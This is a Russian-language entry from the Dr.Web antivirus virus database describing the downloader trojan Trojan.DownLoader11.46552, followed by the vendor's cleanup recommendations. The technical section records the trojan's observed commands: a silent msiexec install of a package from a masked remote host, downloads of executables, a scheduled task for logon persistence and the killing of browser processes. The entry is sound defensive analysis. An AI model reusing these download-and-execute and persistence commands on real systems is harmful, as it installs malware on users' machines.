Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.DownLoader11.46552

Добавлен в вирусную базу Dr.Web: 2014-11-25

Описание добавлено:

Техническая информация

Вредоносные функции:
Создает и запускает на исполнение:
  • '%TEMP%\nsrE60B.tmp\max.exe' {2159CB25-EF9A-54C1-B43C-E30D1A4A8277}
  • '%TEMP%\nsrE60B.tmp\nsA80.tmp' "%TEMP%\nsrE60B.tmp\max.exe" {2159CB25-EF9A-54C1-B43C-E30D1A4A8277}
  • '%TEMP%\nsrE60B.tmp\ns2E67.tmp' "%PROGRAM_FILES%\NpackdCL\npackdcl.exe" add-repo --url=https://www.it###ike.com/addon/repo/repository.xml --bare-format
  • '%TEMP%\nsrE60B.tmp\str.exe' -d -s "<LS_APPDATA>\NSManager\manager.exe" /accepteula
  • '%TEMP%\nsrE60B.tmp\ns2FFD.tmp' "%PROGRAM_FILES%\NpackdCL\npackdcl.exe" remove-repo --url=https://windows-package-manager.googlecode.com/hg/repository/Rep.xml --bare-format
  • '%TEMP%\nsrE60B.tmp\str.exe' -d -s "%PROGRAM_FILES%\Like\Like.dll" /accepteula
  • '%TEMP%\nsrE60B.tmp\nsFE6D.tmp' "%TEMP%\nsrE60B.tmp\str.exe" -d -s "%PROGRAM_FILES%\Like\Like.dll" /accepteula
  • '%TEMP%\nsrE60B.tmp\nsE715.tmp' "<SYSTEM32>\cmd.exe" /C wmic computersystem get model /format:list
  • '%TEMP%\nsrE60B.tmp\ns226.tmp' "%WINDIR%\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" "%PROGRAM_FILES%\Like\Like.dll" /s /codebase
  • '%TEMP%\nsrE60B.tmp\max.exe' (загружен из сети Интернет)
  • '%TEMP%\nsrE60B.tmp\str.exe' (загружен из сети Интернет)
Запускает на исполнение:
  • '<SYSTEM32>\conhost.exe' /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  • '<SYSTEM32>\conhost.exe' <SYSTEM32>\schtasks.exe /create /tn NSManager_1416941442 /sc onlogon /tr "\"<LS_APPDATA>\NSManager\manager.exe\"" /rl highest
  • '<SYSTEM32>\conhost.exe' /create /tn NSManager_1416941442 /sc onlogon /tr "\"<LS_APPDATA>\NSManager\manager.exe\"" /rl highest
  • '<SYSTEM32>\msiexec.exe' /qb- /i http://di#######nk7d.cloudfront.net/cl.msi
  • '<SYSTEM32>\Wat\WatAdminSvc.exe' /run
  • '<SYSTEM32>\Wbem\WMIC.exe' computersystem get model /format:list
  • '%WINDIR%\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' "%PROGRAM_FILES%\Like\Like.dll" /s /codebase
Завершает или пытается завершить
следующие пользовательские процессы:
  • chrome.exe
  • firefox.exe
  • iexplore.exe
Изменения в файловой системе:
Создает следующие файлы:
  • <LS_APPDATA>\Microsoft\Windows\Temporary Internet Files\Content.IE5\3U23MFC9\manager[1].zip
  • %TEMP%\nsrE60B.tmp\manager.zip
  • %TEMP%\nsrE60B.tmp\ns3398.tmp
  • %TEMP%\nsrE60B.tmp\ns3194.tmp
  • %TEMP%\nsrE60B.tmp\nsCE1.tmp
  • %TEMP%\nsrE60B.tmp\ns2E67.tmp
  • %TEMP%\nsrE60B.tmp\ns2FFD.tmp
  • %TEMP%\nsrE60B.tmp\System.dll
  • %TEMP%\nsrE60B.tmp\nsJSON.dll
  • <LS_APPDATA>\Microsoft\Windows\Temporary Internet Files\Content.IE5\UEWNTWLX\li1001[1].zip
  • %TEMP%\nsrE60B.tmp\li.zip
  • %TEMP%\nsrE60B.tmp\likeff.zip
  • %TEMP%\nsrE60B.tmp\ns377F.tmp
  • <SYSTEM32>\Tasks\NSManager_1416941442
  • <LS_APPDATA>\Microsoft\Windows\Temporary Internet Files\Content.IE5\YIF7DGLM\likeff[1].zip
  • <Служебный элемент>
  • <LS_APPDATA>\Microsoft\Windows\Temporary Internet Files\Content.IE5\YIF7DGLM\max[1].exe
  • %TEMP%\nsrE60B.tmp\max.exe
  • <LS_APPDATA>\Microsoft\Windows\Temporary Internet Files\Content.IE5\UEWNTWLX\str[1].exe
  • %TEMP%\nsrE60B.tmp\inetc.dll
  • %TEMP%\nsrE60B.tmp\nsExec.dll
  • %TEMP%\nsrE60B.tmp\nsE715.tmp
  • %TEMP%\nsrE60B.tmp\str.exe
  • %TEMP%\nsrE60B.tmp\nsFE6D.tmp
  • %TEMP%\nsrE60B.tmp\ns226.tmp
  • %TEMP%\nsrE60B.tmp\nsA80.tmp
  • %TEMP%\nsrE60B.tmp\nsUnzip.dll
  • %TEMP%\nsrE60B.tmp\nsProcess.dll
  • <LS_APPDATA>\Microsoft\Windows\Temporary Internet Files\Content.IE5\23BUYPX5\likeie[1].zip
  • %TEMP%\nsrE60B.tmp\likeie.zip
Удаляет следующие файлы:
  • %TEMP%\nsrE60B.tmp\ns2FFD.tmp
  • %TEMP%\nsrE60B.tmp\ns2E67.tmp
  • %TEMP%\nsrE60B.tmp\ns3194.tmp
  • %TEMP%\nsrE60B.tmp\ns377F.tmp
  • %TEMP%\nsrE60B.tmp\ns3398.tmp
  • %TEMP%\nsrE60B.tmp\nsFE6D.tmp
  • %TEMP%\nsrE60B.tmp\nsE715.tmp
  • %TEMP%\nsrE60B.tmp\ns226.tmp
  • %TEMP%\nsrE60B.tmp\nsCE1.tmp
  • %TEMP%\nsrE60B.tmp\nsA80.tmp
Сетевая активность:
Подключается к:
  • 'ct###.#indowsupdate.com':80
  • 'd1#######ffo0h.cloudfront.net':80
  • 'di#######nk7d.cloudfront.net':80
TCP:
Запросы HTTP GET:
  • ct###.#indowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?5f##############
  • di#######nk7d.cloudfront.net/manager.zip
  • d1#######ffo0h.cloudfront.net/li1001.zip
  • d1#######ffo0h.cloudfront.net/likeff.zip
  • di#######nk7d.cloudfront.net/str.exe
  • di#######nk7d.cloudfront.net/max.exe
  • di#######nk7d.cloudfront.net/cl.msi
  • d1#######ffo0h.cloudfront.net/likeie.zip
UDP:
  • DNS ASK ct###.#indowsupdate.com
  • DNS ASK d1#######ffo0h.cloudfront.net
  • DNS ASK di#######nk7d.cloudfront.net
Другое:
Ищет следующие окна:
  • ClassName: 'Shell_TrayWnd' WindowName: ''
  • ClassName: 'SysListView32' WindowName: ''
  • ClassName: '#32770' WindowName: ''

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке